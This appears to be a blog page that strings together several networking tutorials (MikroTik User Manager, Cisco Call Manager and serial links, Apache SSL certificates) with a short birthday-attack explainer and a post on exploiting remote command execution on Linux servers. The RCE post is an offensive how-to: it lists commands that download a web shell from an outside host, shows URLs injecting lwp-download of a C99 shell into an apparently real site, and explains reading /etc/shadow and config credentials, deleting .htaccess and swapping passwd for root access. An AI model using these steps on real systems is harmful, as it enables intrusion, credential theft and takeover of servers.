Config User Manager On Mikrotik

In This Post, We Want To Setup User Manager On Mikrotik.
User Manager, Is Accounting Program Using Radius.
You Can Download The User Manager Package From Mikrotik Website.
Let's See, How To Config User Manager On Mikrotik:
At First, Let's Enable Radius Accounting On Mikrotik:

/ ppp aaa set use-radius=yes

And PPP Profile:

/ ppp profile set default local-address=192.168.0.1

In Which, 192.168.0.1 Is Local Ip Address, That Is Used For Example For PPPoE Server Or VPN Interface Or Etc...
And Now, Let's Add radius Client To Consult User Manager for PPP service:

/ radius add service=ppp address=10.0.0.1 secret=123456789

10.0.0.1 Is The Accounting Server Ip Address, And 123456789 Is The Secret.
 
Now, Let's Add Owner To User Manager:
 
/ tool user-manager customer add login="uman-admin" password="1234" permissions=owner
 
uman-admin Is Login Name And 1234 Is The Password.
And It's Time To Add PPP server information to router list:
 
/ tool user-manager router add customer=uman-admin ip-address=10.0.0.1 shared-secret=123456789
 
uman-admin Is The Login Name, 10.0.0.1 Is The Accounting Server Ip Address And 123456789 Is The Secret.
It's Done, You Can Access To User Manager By Using:
 
http://serveripaddress/userman

Setup Call Manager On Cisco Router

Some Of The Cisco Routers, Are Able To Work As Call Manager, Like 2600 Series, 2800 Series, 3600 Series, 3700 Series And 7200 Series.


It's Important That The IOS On The Router Should Support Call Manager.
Let's See. How To Config Call Manager On Router.


At First, Go To The Configuration Mode:

 >enable
 #config terminal
 (config)#telephony-service

Now, It's Time To Set The Maximum Number Of Phones That Are Able To Communicate With Each Other:

 (config-telephony)#max-ephones 2
 (config-telephony)#max-dn 2

In My Example, We Have Two Phones.
Now, We Should Set The IP Source Address And The Port:

 (config-telephony)#ip source-address 192.168.0.20 port 2000
 (config-telephony)#exit

Our Source Address Is 192.168.0.20 And The Port Is 2000.
Now, Let's Set The Call Number Of ephone:

 (config)#ephone-dn 1
 (config-ephone-dn)#number 1234
 (config-ephone-dn)#exit

 (config)#ephone-dn 2
 (config-ephone-dn)#number 5678
 (config-ephone-dn)#exit

 Now, We Should Set The MAC Address Of The Phones And The Type Of Them:

 (config)#ephone 1
 (config-ephone)#mac-address 00aa.aaaa.aaaa
 (config-ephone)#type 7902
 (config-ephone)#button 1:1
 (config-ephone)#exit

 (config)#ephone 2
 (config-ephone)#mac-address 00bb.bbbb.bbbb
 (config-ephone)#type 7902
 (config-ephone)#button 1:2
 (config-ephone)#exit 

Let's Check The Registered Phones:

 #show ephone

Well Done, Your Phones Are Ready.

Remote Command Execution (RCE) Vulnerability ::: Exploting In Linux

Remote Command Execution Is A Kind Of Vulnerability In Which You Are Able To Run Commands On Victim Server.

This Is Usually A Hight Risk Vulnerability, And There Are Lots Of Methods For Using This Vulnerability, To Get The Access From The Victim Server.

When Ever, A Value Of A Variable Like "cmd" Inject To A Function That Is Enabled To Run Command, Such As System,Passthru And etc In PHP, And If You Are Able To Inject You Command In The Variable, Then RCE Happens.

There Are Lots Of Methods For Using This Vulnerability, Let's Talk About The Major Ways:

1-Download The Shell Script Code, In Victim Server, By Using Download Commands:
In Linux Os, There Are A Series Of Commands, That Enables You To Download The Special File On The Server,.

Let's See Example:

We Have The RCE In This Website.

Now, We Are Able To Inject "cmd" Variable.

Well, We Want To Download The File On The Server, Use On Of These Commands:

lwp-download http://[shell]

wget http://shell -O shell.php

fetch -o shell.php.php -p http://shell

lynx -source http://shell > shell.php

inks -source http://shell > shell.php

GET http://shell > shell.php
 
In My Example, Wget Doesn't Work, The I Tried lwp-download And Download The C99 Shell Script On The Server, Then Renamed That From C99.txt To C99.php.

http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php

Well Done, Now We Have C99 Shell Script In http://angelptc.info/c99.php  .


2-Reading Files:

 2-1:Reading Shadow File: Shadow Is The Most Important File In Linux, Sometimes, The Shodow File Has The Permission Of Reading, Then , You Are Able To Read It By: cat /etc/shadow
After That, You Can Crack It And Get The Root Access.

 2-2:Reading Configuration File:
 Someitmes And In Some Website And Content Management Systems, There Are Good Information In Configuration File, For Example In Joomla/Mambo CMS, There Is A Section , In Which There Are The FTP Username And Password, Or Sometimes, The Website Owner, Puts The Password Of Hosting Control Panel In The Configuration File For Database Password Or etc.
And In Some Website Applications, Administrator Username And Password Store In Files, You Can Read Them, And Find Administratior Username And Password. 
You Can Read Configuration File With cat Command. 

 2-3 :Reading Other Hosts Web Application Configuration File:
 You Can Also Read Other Hosts Web Application's Configration File, In Order To Gain Information And Find Something Like FTP Information, Hosting Control Panel Information And Etc.

3:Removing Files: In Some Web Applications, Administrator Folder Is Password Protected, You Can Remove The File That Causes This Protection, And Use The Administrator Folder.
For Example, In Apache Web Server, .htaccess File Causes The Folder Protection, You Can delete The File With rm -rf Command And Use The Administrator Folder.
And Also, In Some Web Applications, The File Manager Or Upload Center Is Password Protected Again, You Can Remove This Protection With The rm -rf Command Again.


4.Updating Files:
In RCE, Editing File Is So Hard, Be Cause Linux Editors Like vi Or nano Has The Special Commands For Saving And Editing, Then You Should Update The Files,
Updating Files Is Usefull, For Example, If passwd File Has The Permission, You're Able To Read it, Delete It And Then Download The New Passwd That Edited By Yourself And Gets The Root Access To You.
Also, You Are Able To Update Configuration Files And The Files That Stores Username And Passwords, To Gain Administrator Access.
Steps Of Updating:
-Read File And Save It To Your Computer(cat command)
-Remove File(rm -rf command)
-Change The File You Have Downloaded And Upload It
-Download The File To The Server And Rename It. (download commands such as wget, get and etc)

 

5-Rename Uploaded File:

Sometimes, You Can Upload Images Or Texts Into Website, But, You Can't Upload PHP File, If There Is RCE Vulnerability, You Can Change The Name Of That File.

At First, Reanme You Shell Script And Change It To .jpg, .gif, .txt And Etc...

Then, Use The mv Command To Change The File Name.

 

mv file.txt file.php

Or Any Other Thing Like This.

Birthday Attack

Imaging That You Have A Hash Fuction, And It's Name Is "F", Now , f(value), If You Enter "a" As Value, For Example, It Returns "k", Now , There Is No Problem, But , The Problem Causes When Another Value Has The Same Result, For Example, If You Enter Value "z", The Function Again Returns "k", This Is Collision.

Birthday Attack Is A Type Of Cryptographic Attack And Based On Birthday Paradox, A Mathematic Subject, Birthday Attack Is Seems To Be A Kind Of Brute Force Attack, In Which, Attacker Trying To Find Two Different Inputs That Have The Same Output.

Now, The Attacker May Be Able To Bypass The Authentication Or Subvert It.

One Of The Most Famous Birthday Attack Vulnerability Is Tacacs+ Authentication Method.

In This Method, We Can See Two Different Sessions With The Same Session ID.

Cisco Router Back To Back Connection

One Of The Most UseFull Connections In Routers, Is Back To Back Connection, In Which, Routers Can Commnucate With Each Other, And Route Packets From Router To Another Router.

For Back To Back Connection, In Cisco Routers, We Use Serial InterFace And Cable For Back To Back Connection.

Here, We Want To Connect R1 And R2 Routers With Back To Back Connection.

Well, After The Cable Connection, It's Time To Configure Back To Back Connection In Routers.

When You Connect Two Routers To Each Other Wirh Back To Back Connection And Serial Interface, One Of Them Is DCE And The Other Is DTE. 

You Should Set Clock Rate For DCE, But DTE, Will Automatically Detects The Clock Rate.  

In This Example. R1 Is DTE, Connected With Serial 0 Interface To R2, And R2 Is DCE, Connected With Serial 1 Interface To R1.

Now, Lets Config Routers.

Router R1:

At First If You Don't Know If The Interface Is DCE Or DTE, Enter This Command:

 show interface serial 0

Now, You Can Find Out That It Is DCE Or DTE. 

After That, You Should Enable Serial 0 Interace, And Assign Ip Address To This Interaface, Be Carefull, Serial 0 Interaface On R1 Router And Serial 1 Interface On R2 Router Should Have Ip Address In The Same Range And The Same Subnetmask. 

 >enable

 #config terminal

 (config)#interface serial 0

 (config-if)#ip address 10.0.0.1 255.255.255.0

 (config-if)#no shutdown

Now, Router R1 Is Ready.....

Router R2:

The Configuration Of R2 Router Is The Same As R1 Router, But This Is DCE And You Should Set Clock Rate.

 >enable

 #config terminal

 (config)#interface serial 1

 (config-if)#ip address 10.0.0.2 255.255.255.0

 (config-if)#no shutdown

 (config-if)#clock rate 5600

Now It Is Ready, Lets Test Our Connection With Ping:

R1 Router:

 #ping 10.0.0.2 

R2 Router:
 
 #ping 10.0.0.1 

Create Self-Signed Certificate And Configure Apache To Run SSL

When Ever You Want To Enable SSL Protocol, You Will Need Certificate, At The End Of This Post, You Are Able To Create Self-Signed Certificate And Enable SSL , In Oreder To Use HTTPS.
By Default, SSL Is Disabled And You Should Enable It Manually.
SSL Protocol Work On 443 Port And You Can Use It By Replacing HTTPS Instead Of HTTP At The Beggining Of The URL.
By Default, HTTP Uses 80 Port And HTTPS Uses 443 Port But You Can Change It In Your Web Server Configuration File.
Lets See, What Should We Do In Order To Enable SSL On Linux Server That Runs Apache As Web Server.

At First, We Should Generate a Private Key, Use The Following Command For This Purpose:

 openssl genrsa -des3 -out certificate.key 1024

This Is 1024bit Key, For Encryption, Using Triple-DES And Stores In PEM Format.
You Should Enter PEM Pass Phrase.
After That, It Is Time To Generate a CSR

 openssl req -new -key certificate.key -out certificate.csr 


When You Enter, It Asks Several Questions, Answer Them Correctly
Now, We Will Remove Pass-Phrase From Key, Apache Asks For Pass-Phrase Each Time It Starts,It Means That When Evers The Server Crashes, Or Reboots, You Should Enter Password In Order To Enable SSL, It Is Possible To Remove The Triple-DES Encryption Form The Key, After That, There Is No Need To Enter Password When The Apache Server Starts

 openssl rsa -in certificate.key -out certificatenew.key 
  
Now, We Will Generate a Self-Signed Certificate

 openssl x509 -req -days 365 -in certificate.csr -signkey certificatenew.key -out certificate.crt 

Now, We Have Self-Signed Certificate, That Is Valid For 1 Year, You Can Change It By Changing Number 365, For Example, If You Change It To 3650, It Is Valid For 10 Years.

If You Want To Install This Certificate On Apache, At Frist You Should Install "mod_ssl", After That, Use The Following Instruction:

 cp certificate.crt /usr/local/apache/conf/ssl.crt  
 cp certificatenew.key/usr/local/apache/conf/ssl.key

Now, We Should Configure SSL Enabled Virtual Hosts:

SSLEngine on
SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt
SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
CustomLog logs/ssl_request_log \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" 

Well Done, Restart Apache:

/etc/init.d/httpd restart

It Should Work Right Now, Try : https://example.com